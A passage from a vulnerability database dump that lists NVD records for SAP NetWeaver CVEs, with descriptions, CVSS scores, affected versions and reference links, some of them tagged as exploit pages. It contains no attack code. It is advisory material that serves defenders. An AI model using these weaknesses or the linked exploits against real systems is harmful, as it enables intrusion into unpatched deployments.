"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CB7AAA9B-5209-4419-87DA-8130843AD2AF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "An unspecified J2EE core service in the J2EE Engine in SAP NetWeaver does not properly restrict access, which allows remote attackers to read and write to arbitrary files via unknown vectors."
},
{
"lang": "es",
"value": "Un servicio del n\u00facleo de J2EE no especificado en J2EE Engine en SAP NetWeaver no restringe debidamente el acceso, lo que permite a atacantes remotos leer o escribir hacia archivos arbitrarios a trav\u00e9s de vectores desconocidos."
}
],
"id": "CVE-2013-7364",
"lastModified": "2024-11-21T02:00:50.693",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2014-04-10T20:55:06.167",
"references": [
{
"source": "cve@mitre.org",
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-02/0133.html"
},
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"url": "http://www.onapsis.com/get.php?resid=adv_onapsis-2013-004"
},
{
"source": "cve@mitre.org",
"url": "http://www.onapsis.com/research-advisories.php"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1682613"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-02/0133.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.onapsis.com/get.php?resid=adv_onapsis-2013-004"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.onapsis.com/research-advisories.php"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1682613"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-264"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2017-04-10 15:59
Modified
2024-11-21 02:43
Severity ?
Summary
Stack-based buffer overflow in SAP NetWeaver 7.0 through 7.5 allows remote attackers to cause a denial of service () by sending a crafted packet to the SAPSTARTSRV port, aka SAP Security Note 2295238.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"matchCriteriaId": "9FC1767F-10BD-468B-8D2B-538C82EB69B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"matchCriteriaId": "D04DC424-129B-448D-994B-7AC5D9B64703",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp3:*:*:*:*:*:*",
"matchCriteriaId": "0D9A5776-17A4-4ECD-8D2B-57D21BB16FF7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.3:*:*:*:*:*:*:*",
"matchCriteriaId": "903CA9A5-1348-4A77-979E-2A2EB15722EA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.3:ehp1:*:*:*:*:*:*",
"matchCriteriaId": "6CD7B893-F184-4F2A-BD23-B1D107D68A15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.4:*:*:*:*:*:*:*",
"matchCriteriaId": "20754323-2EF6-4726-B34B-354F9C352A56",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "74F7C92A-48F7-456A-BDFF-91A482DE8546",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in SAP NetWeaver 7.0 through 7.5 allows remote attackers to cause a denial of service () by sending a crafted packet to the SAPSTARTSRV port, aka SAP Security Note 2295238."
},
{
"lang": "es",
"value": "El desbordamiento de b\u00fafer basado en pila en SAP NetWeaver desde 7.0 hasta la versi\u00f3n 7.5 permite a atacantes remotos causar una denegaci\u00f3n de servicio () enviando un paquete manipulado al puerto SAPSTARTSRV, tambi\u00e9n conocido como Nota de seguridad de SAP 2295238."
}
],
"id": "CVE-2016-10311",
"lastModified": "2024-11-21T02:43:45.610",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": true,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2017-04-10T15:59:00.300",
"references": [
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-11-20 14:12
Modified
2024-11-21 01:59
Severity ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the (1) JavaDumpService and (2) DataCollector servlets in SAP NetWeaver allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CB7AAA9B-5209-4419-87DA-8130843AD2AF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the (1) JavaDumpService and (2) DataCollector servlets in SAP NetWeaver allow remote attackers to inject arbitrary web script or HTML via unspecified vectors."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades de XSS en servlets (1) JavaDumpServices y (2) DataCollector de SAP NetWeaver permite a atacantes remotos inyectar script web o HTML arbitrario a trav\u00e9s de vectores sin especificar."
}
],
"id": "CVE-2013-6816",
"lastModified": "2024-11-21T01:59:45.750",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2013-11-20T14:12:30.930",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/55777"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-13-018-sap-netweaver-servlet-javadumpservice-multiple-xss/"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-13-019-sap-netweaver-servlet-datacollector-multiple-xss/"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1828801"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/55777"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-13-018-sap-netweaver-servlet-javadumpservice-multiple-xss/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-13-019-sap-netweaver-servlet-datacollector-multiple-xss/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1828801"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-05-19 14:55
Modified
2024-11-21 02:08
Severity ?
Summary
SAP NetWeaver 7.20 and earlier allows remote attackers to read arbitrary SAP Central User Administration (SAP CUA) tables via unspecified vectors.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5E0CA847-05AD-4911-99F7-DC5B0AB689BC",
"versionEndIncluding": "7.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"matchCriteriaId": "9FC1767F-10BD-468B-8D2B-538C82EB69B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"matchCriteriaId": "D04DC424-129B-448D-994B-7AC5D9B64703",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:sp15:*:*:*:*:*:*",
"matchCriteriaId": "ABEE6BE3-556F-4A1E-8FA3-CD5E5C1D42E9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:sp8:*:*:*:*:*:*",
"matchCriteriaId": "73914503-E9AA-4382-85FC-B0DD45ABDD77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.01:*:*:*:*:*:*:*",
"matchCriteriaId": "2794A7DB-D5B8-467E-93F4-D65245FF187D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"matchCriteriaId": "A9805246-77E5-456C-B7CF-07CFF2F9F069",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.03:*:*:*:*:*:*:*",
"matchCriteriaId": "369D0212-65DA-4121-981B-1F07B7465F97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "EDFFDB95-B956-4B22-81F4-A4074D49D4A8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver 7.20 and earlier allows remote attackers to read arbitrary SAP Central User Administration (SAP CUA) tables via unspecified vectors."
},
{
"lang": "es",
"value": "SAP NetWeaver 7.20 y anteriores permite a atacantes remotos leer tablas de SAP Central User Administration (SAP CUA) arbitrarias a trav\u00e9s de vectores no especificados."
}
],
"id": "CVE-2014-3787",
"lastModified": "2024-11-21T02:08:49.950",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2014-05-19T14:55:13.487",
"references": [
{
"source": "cve@mitre.org",
"url": "http://en.securitylab.ru/lab/PT-2014-09"
},
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/58671"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1997455"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://en.securitylab.ru/lab/PT-2014-09"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/58671"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1997455"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2017-09-06 21:29
Modified
2024-11-21 02:36
Severity ?
Summary
XML External Entity (XXE) vulnerability in SAP Netweaver before 7.01.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://packetstormsecurity.com/files/133627/SAP-Netweaver-XML-External-Entity-Injection.html | Exploit, Third Party Advisory, VDB Entry | |
| cve@mitre.org | http://www.securityfocus.com/archive/1/536504/100/0/threaded | ||
| cve@mitre.org | http://www.securityfocus.com/bid/76809 | Third Party Advisory, VDB Entry | |
| cve@mitre.org | https://www.exploit-db.com/exploits/38261/ | Exploit, Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://packetstormsecurity.com/files/133627/SAP-Netweaver-XML-External-Entity-Injection.html | Exploit, Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/archive/1/536504/100/0/threaded | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/76809 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.exploit-db.com/exploits/38261/ | Exploit, Third Party Advisory, VDB Entry |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A5600176-0A22-4D2D-9903-D5841864C8D5",
"versionEndIncluding": "7.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "XML External Entity (XXE) vulnerability in SAP Netweaver before 7.01."
},
{
"lang": "es",
"value": "Existe una vulnerabilidad de tipo XML External Entity (XEE) en versiones de SAP Netweaver anteriores a la 7.01."
}
],
"id": "CVE-2015-7241",
"lastModified": "2024-11-21T02:36:25.007",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2017-09-06T21:29:00.990",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/133627/SAP-Netweaver-XML-External-Entity-Injection.html"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/536504/100/0/threaded"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/76809"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/38261/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/133627/SAP-Netweaver-XML-External-Entity-Injection.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/536504/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/76809"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/38261/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-611"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2016-10-13 14:59
Modified
2024-11-21 02:58
Severity ?
Summary
SAP Netweaver 7.40 improperly logs (1) DUI and (2) DUJ events in the SAP Security Audit Log as non-critical, which might allow local users to hide rejected attempts to execute RFC function callbacks by leveraging filtering of non-critical events in audit analysis reports, aka SAP Security Note 2252312.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://seclists.org/fulldisclosure/2016/Oct/53 | Third Party Advisory | |
| cve@mitre.org | http://www.securityfocus.com/bid/93503 | Broken Link | |
| cve@mitre.org | https://www.onapsis.com/research/security-advisories/sap-business-objects-memory-corruption-0 | Permissions Required, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://seclists.org/fulldisclosure/2016/Oct/53 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/93503 | Broken Link | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.onapsis.com/research/security-advisories/sap-business-objects-memory-corruption-0 | Permissions Required, Third Party Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP Netweaver 7.40 improperly logs (1) DUI and (2) DUJ events in the SAP Security Audit Log as non-critical, which might allow local users to hide rejected attempts to execute RFC function callbacks by leveraging filtering of non-critical events in audit analysis reports, aka SAP Security Note 2252312."
},
{
"lang": "es",
"value": "SAP Netweaver 7.40 registra incorrectamente eventos (1) DUI y (2) DUJ en el SAP Security Audit Log como no cr\u00edticos, lo que podr\u00eda permitir a usuarios locales ocultar intentos rechazados de ejecutar la rellamada a la funci\u00f3n RFC aprovechando el filtrado de eventos no cr\u00edticos en informes de auditoria de an\u00e1lisis, vulnerabilidad tambi\u00e9n conocida como SAP Security Note 2252312."
}
],
"evaluatorComment": "\u003ca href=\"http://cwe.mitre.org/data/definitions/778.html\"\u003eCWE-778: Insufficient Logging\u003c/a\u003e",
"id": "CVE-2016-7437",
"lastModified": "2024-11-21T02:58:00.530",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 1.8,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2016-10-13T14:59:12.237",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/53"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://www.securityfocus.com/bid/93503"
},
{
"source": "cve@mitre.org",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-business-objects-memory-corruption-0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/53"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "http://www.securityfocus.com/bid/93503"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-business-objects-memory-corruption-0"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-09-11 15:29
Modified
2024-11-21 04:03
Severity ?
Summary
In certain cases, BEx Web Java Runtime Export Web Service in SAP NetWeaver BI 7.30, 7.31. 7.40, 7.41, 7.50, does not sufficiently validate an XML document accepted from an untrusted source.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | http://www.securityfocus.com/bid/105326 | Third Party Advisory, VDB Entry | |
| cna@sap.com | https://launchpad.support.sap.com/#/notes/2644279 | Permissions Required, Vendor Advisory | |
| cna@sap.com | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/105326 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/2644279 | Permissions Required, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993 | Vendor Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:business_intelligence:*:*:*",
"matchCriteriaId": "45D0E5C9-450E-42CB-9B8B-C7F7C96BABFF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:business_intelligence:*:*:*",
"matchCriteriaId": "F021AA30-D8FE-4B61-A8DB-70850DC51D1E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:business_intelligence:*:*:*",
"matchCriteriaId": "C566DF24-0E79-4EE7-A11C-1C89970722CA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.41:*:*:*:business_intelligence:*:*:*",
"matchCriteriaId": "E7368E55-5827-4BEC-82F9-7156AD91EA35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:business_intelligence:*:*:*",
"matchCriteriaId": "02899A1B-473E-44EE-8A8C-AAF980DF531C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In certain cases, BEx Web Java Runtime Export Web Service in SAP NetWeaver BI 7.30, 7.31. 7.40, 7.41, 7.50, does not sufficiently validate an XML document accepted from an untrusted source."
},
{
"lang": "es",
"value": "En ciertos casos, BEx Web Java Runtime Export Web Service en SAP NetWeaver BI 7.30, 7.31, 7.40, 7.41 y 7.50 no valida lo suficiente un documento XML aceptado de una fuente no fiable."
}
],
"id": "CVE-2018-2462",
"lastModified": "2024-11-21T04:03:51.467",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-09-11T15:29:01.750",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/105326"
},
{
"source": "cna@sap.com",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2644279"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/105326"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2644279"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-01-23 20:15
Modified
2024-11-21 01:49
Severity ?
Summary
A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
